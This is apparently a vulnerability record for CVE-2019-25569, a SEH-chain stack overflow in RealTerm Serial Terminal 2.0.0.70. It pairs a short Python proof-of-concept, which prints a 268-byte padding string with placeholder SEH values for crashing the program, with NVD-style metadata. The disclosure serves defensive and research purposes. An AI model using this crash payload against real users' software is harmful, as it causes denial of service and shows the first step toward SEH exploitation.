CVE-2019-25569

import sys # PoC for CVE-2019-25569: RealTerm Serial Terminal SEH Overflow # This script generates a malicious string to crash the application. def generate_payload(): # Padding to reach the SEH structure (268 bytes) padding = b"A" * 268 # Overwriting the Next SEH and SE Handler addresses # Using 'BBBB' for nSEH and 'CCCC' for SEH to demonstrate the crash nseh = b"BBBB" seh = b"CCCC" # Combine the parts to form the payload payload = padding + nseh + seh return payload if __name__ == "__main__": payload = generate_payload() print(f"[*] Payload length: {len(payload)}") print(f"[*] Copy the following string and paste it into the 'Echo Port' field:") print(payload.decode('latin-1'))

{"cve": {"id": "CVE-2019-25569", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:20.653", "lastModified": "2026-03-24T20:43:05.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RealTerm Serial Terminal 2.0.0.70 contains a stack-based buffer overflow vulnerability in the Echo Port field that allows local attackers to crash the application by triggering a structured exception handler (SEH) chain corruption. Attackers can craft a malicious input string with 268 bytes of padding followed by SEH overwrite values and paste it into the Port field to cause denial of service."}, {"lang": "es", "value": "RealTerm Serial Terminal 2.0.0.70 contiene una vulnerabilidad de desbordamiento de búfer basado en pila en el campo Echo Port que permite a atacantes locales bloquear la aplicación al desencadenar una corrupción de la cadena de gestores de excepciones estructuradas (SEH). Los atacantes pueden crear una cadena de entrada maliciosa con 268 bytes de relleno seguida de valores de sobrescritura de SEH y pegarla en el campo Port para causar denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crun:realterm:2.0.0.70:*:*:*:*:*:*:*", "matchCriteriaId": "CBB4049D-EE6D-4CA8-B20B-5F32A28157EE"}]}]}], "references": [{"url": "https://realterm.sourceforge.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://sourceforge.net/projects/realterm/files/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46391", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/realterm-serial-terminal-seh-overflow-crash", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}